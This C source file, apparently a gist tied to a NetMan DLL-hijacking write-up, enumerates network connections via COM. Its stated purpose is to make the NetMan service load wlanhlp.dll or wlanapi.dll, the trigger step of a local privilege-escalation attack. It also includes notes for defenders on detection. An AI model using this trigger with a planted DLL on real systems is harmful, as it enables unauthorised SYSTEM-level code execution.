Trigger NetMan to load wlanhlp.dll or wlanapi.dll in native C
| /* https://itm4n.github.io/windows-server-netman-dll-hijacking/ */ | |
| #include <windows.h> | |
| #include <netcon.h> | |
| #include <stdio.h> | |
| /* https://github.com/reactos/reactos/blob/master/sdk/lib/uuid/otherguids.c */ | |
/* Interface ID and class ID used below to create the network connection
 * manager COM object; values come from the ReactOS GUID list referenced above. */
/* NOTE(review): DEFINE_GUID only emits a definition when INITGUID is defined
 * (for example by including <initguid.h> first); otherwise these two lines are
 * extern declarations. Confirm the build supplies the definitions. */
| DEFINE_GUID(IID_INetConnectionManager, 0xC08956A2,0x1CD3,0x11D1,0xB1,0xC5,0x00,0x80,0x5F,0xC1,0x27,0x0E); | |
| DEFINE_GUID(CLSID_ConnectionManager, 0xBA126AD1,0x2166,0x11D1,0xB1,0xD0,0x00,0x80,0x5F,0xC1,0x27,0x0E); | |
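/**
 * Enumerate the machine's network connections through the
 * INetConnectionManager COM interface and print each connection name.
 *
 * Steps: load Netshell.dll and resolve NcFreeNetconProperties, initialise COM
 * (multithreaded), create the connection manager, walk the enumerator one
 * connection at a time, print pszwName, and release everything acquired.
 *
 * Context, per the gist description and the write-up linked at the top of the
 * file: this enumeration is the client-side request that makes the NetMan
 * service attempt to load wlanhlp.dll / wlanapi.dll. For defenders reproducing
 * the behaviour, the useful signals are image-load events for those two DLL
 * names in the service host and the ACLs on directories in the system search
 * path (see the linked write-up for affected builds; not verifiable from this
 * file alone).
 *
 * Errors are reported on stdout and the function returns early; every exit
 * path releases what was acquired before it.
 */
void go(void) {
    /* Typed pointer instead of a bare FARPROC so the call below is checked
     * against the one-argument prototype. WINAPI matches FARPROC's convention. */
    typedef VOID (WINAPI *NcFreeNetconProperties_fn)(NETCON_PROPERTIES *);

    INetConnectionManager *p_NetConnectionManager = NULL;
    IEnumNetConnection *p_EnumConnection = NULL;
    INetConnection *p_Connection = NULL;
    NETCON_PROPERTIES *p_ConnectionProperties = NULL;
    const char s_NetShell[] = "Netshell.dll";
    const char s_NcFreeNetconProperties[] = "NcFreeNetconProperties";
    ULONG count = 0;
    HRESULT h_res;
    HMODULE h_NetShell = NULL;
    NcFreeNetconProperties_fn NcFreeNetconProperties = NULL;

    /* The name is a narrow string, so call the A variant explicitly (the
     * generic macro resolves to the W variant in UNICODE builds). Restricting
     * the search to System32 keeps this bare-name load from being satisfied by
     * a same-named DLL elsewhere on the search path. The flag needs KB2533623
     * on Windows 7 / Server 2008 R2. */
    h_NetShell = LoadLibraryExA(s_NetShell, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
    if (h_NetShell == NULL) {
        /* GetLastError() returns a DWORD: print it as unsigned long. */
        printf("LoadLibrary failed with error %lu\n", (unsigned long)GetLastError());
        return;
    }

    NcFreeNetconProperties =
        (NcFreeNetconProperties_fn)GetProcAddress(h_NetShell, s_NcFreeNetconProperties);
    if (NcFreeNetconProperties == NULL) {
        printf("GetProcAddress failed with error %lu\n", (unsigned long)GetLastError());
        goto out_unload;
    }

    /* Initialize COM for this thread. */
    h_res = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    if (FAILED(h_res)) {
        /* HRESULTs are conventionally read in hex. */
        printf("CoInitializeEx failed with error 0x%08lx\n", (unsigned long)h_res);
        goto out_unload;
    }

    /* Create the connection manager COM object. */
    h_res = CoCreateInstance(&CLSID_ConnectionManager, NULL, CLSCTX_ALL,
                             &IID_INetConnectionManager,
                             (void **)&p_NetConnectionManager);
    if (FAILED(h_res)) {
        printf("CoCreateInstance failed with error 0x%08lx\n", (unsigned long)h_res);
        goto out_com;
    }

    h_res = p_NetConnectionManager->lpVtbl->EnumConnections(
        p_NetConnectionManager, NCME_DEFAULT, &p_EnumConnection);
    if (FAILED(h_res)) {
        printf("EnumConnections failed with error 0x%08lx\n", (unsigned long)h_res);
        /* The manager was created successfully and must still be released. */
        goto out_manager;
    }

    /* Fetch one connection per iteration until the enumerator stops returning S_OK. */
    while (p_EnumConnection->lpVtbl->Next(p_EnumConnection, 1, &p_Connection, &count) == S_OK) {
        h_res = p_Connection->lpVtbl->GetProperties(p_Connection, &p_ConnectionProperties);
        if (SUCCEEDED(h_res)) {
            wprintf(L"Interface: %ls\n", p_ConnectionProperties->pszwName);
            /* The properties block is freed with the Netshell.dll helper. */
            NcFreeNetconProperties(p_ConnectionProperties);
            p_ConnectionProperties = NULL;
        }
        p_Connection->lpVtbl->Release(p_Connection);
        p_Connection = NULL;
    }

    p_EnumConnection->lpVtbl->Release(p_EnumConnection);
out_manager:
    p_NetConnectionManager->lpVtbl->Release(p_NetConnectionManager);
out_com:
    CoUninitialize();
out_unload:
    /* Unload last: NcFreeNetconProperties lives in this module. */
    FreeLibrary(h_NetShell);
}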
/* Program entry point: runs the connection enumeration once. The command-line
 * arguments and the environment block are not used. */
int main(int argc, char **argv, char **envp) {
    (void)argc;
    (void)argv;
    (void)envp;

    go();
    return 0;
}